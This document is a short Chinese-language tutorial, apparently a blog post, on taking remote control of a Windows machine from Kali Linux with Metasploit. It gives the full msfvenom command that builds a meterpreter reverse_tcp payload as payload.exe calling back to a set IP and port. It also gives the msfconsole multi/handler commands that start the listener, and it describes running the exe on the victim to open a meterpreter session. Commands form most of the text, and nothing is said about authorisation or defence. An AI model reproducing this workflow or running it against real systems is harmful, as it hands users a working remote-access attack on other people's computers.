一、在Kali Linux中生成被控端
- 第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:
- -p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”
- lhost:设置kali的IP
- lport:设置端口(要与下面的set lport保持一致)
- -f:文件的类型为exe类型
- -o:生成payload,名为payload.exe,保存在kali的/root目录下
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f exe -o /root/payload.exe
- 第二步:然后把上面在kali中生成的payload.exe移动到Windows系统中
二、在Kali Linux中启动主控端
- 第一步:在kali中输入msfconsole命令启动Metasploit工具
msfconsole
- 第二步:输入下面的命令,在Metasploit中使用handler作为主动端,这个handler位于exploit下的multi目录下
use exploit/multi/handler
- 第三步:设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)
set payload windows/meterpreter/reverse_tcp
- 第四步:设置一个lhost和lport,要与文章最开始的msfvenom命令中的IP和端口保持一致
- 最后一步:执行“exploit”开启监听,等待被控端打开远程控制软件连接到此处
exploit
三、执行远程控制软件
- 上面生成了远程控制的被控端与主控端之后,现在来执行被控端的软件,执行之后,被控端就与主控端连接了
- 第一步:在Windows中双击这个软件
- 第二步:执行之后,可以看到kali主控端连接上了被控端。并且开启了meterpreter会话
- 第三步:现在主控端可以输入命令来操作被控端(注意,虽然被控端是windows平台,但是使用的命令是主控端系统所使用的命令)
